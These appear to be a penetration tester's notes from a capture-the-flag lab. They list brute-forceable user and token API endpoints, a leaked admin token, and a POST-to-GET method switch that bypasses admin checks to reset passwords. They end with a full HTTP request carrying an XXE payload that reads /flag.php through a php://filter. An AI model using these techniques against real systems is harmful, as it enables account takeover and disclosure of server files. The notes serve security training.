=== Vuln Endpoint ===

--- Can run bruteforce to this endpoint ---
`/api.php/user/id`
`/api.php/token/id`


URL search query
{"uid":"52","username":"a.corrales","full_name":"Amor Corrales","company":"Administrator"}

Admin token
endpoint: /api.php/token/<ADMIN_ID>
{"token":"e51a85fa-17ac-11ec-8e51-e78234eb7b0c"} 

Change method (POST => GET) to bypass admin and it's can reset password
===NOTE=== (for BURP): 
When change HTTP method don't forget to move parameter into url. (can use right click and click on change burpmethod)


POST /addEvent.php HTTP/1.1
Host: 167.99.201.245:32449
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://167.99.201.245:32449/event.php
Content-Type: text/plain;charset=UTF-8
Origin: http://167.99.201.245:32449
Content-Length: 267
Connection: close
Cookie: PHPSESSID=k8pqar41j0k8paep5srhjve1nh; uid=52

<!DOCTYPE name [
  <!ENTITY content SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">
]>
<root>
<name>
&content;
</name>
<details>test</details>
<date>2023-06-07</date>
</root>
